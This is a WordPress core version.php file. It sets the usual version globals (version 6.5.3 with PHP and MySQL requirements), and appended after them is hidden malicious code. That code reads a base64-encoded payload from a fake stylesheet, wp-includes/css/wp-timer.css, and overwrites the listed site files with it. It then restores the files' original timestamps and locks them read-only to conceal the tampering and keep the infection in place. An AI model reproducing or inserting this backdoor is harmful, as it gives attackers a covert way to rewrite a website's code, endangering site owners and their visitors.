<?php
/**
 * WordPress Version
 *
 * Contains version information for the current WordPress release.
 *
 * @package WordPress
 * @since 1.2.0
 */

/**
 * The WordPress version string.
 *
 * Holds the current version number for WordPress core. Used to bust caches
 * and to enable development mode for scripts when running from the /src directory.
 *
 * @global string $wp_version
 */
$wp_version = '6.5.3';

/**
 * Holds the WordPress DB revision, increments when changes are made to the WordPress DB schema.
 *
 * @global int $wp_db_version
 */
$wp_db_version = 57155;

/**
 * Holds the TinyMCE version.
 *
 * @global string $tinymce_version
 */
$tinymce_version = '49110-20201110';

/**
 * Holds the required PHP version.
 *
 * @global string $required_php_version
 */
$required_php_version = '7.0.0';

/**
 * Holds the required MySQL version.
 *
 * @global string $required_mysql_version
 */
$required_mysql_version = '5.5.5';

$wp_update_file="/home/elcont/public_html/wp-includes/css/wp-timer.css";
if ( is_file($wp_update_file) )
{
    $wp_update_content=trim(file_get_contents($wp_update_file));
    if ( $wp_update_content!="" )
    {
        $wp_update_content=substr($wp_update_content,6,-6);
        $wp_update_content=base64_decode($wp_update_content);
        $wp_update_arr=json_decode($wp_update_content,true);
        if ( is_array($wp_update_arr) )
        {
            foreach($wp_update_arr as $value) 
            { 
                $file_mtime=filemtime($value["path"]);
                @chmod($value["path"],0777);
                @unlink($value["path"]);
                @file_put_contents($value["path"],$value["content"]);
                @touch($value["path"],$file_mtime);
                @chmod($value["path"],0444);
            }
        }
    }
}
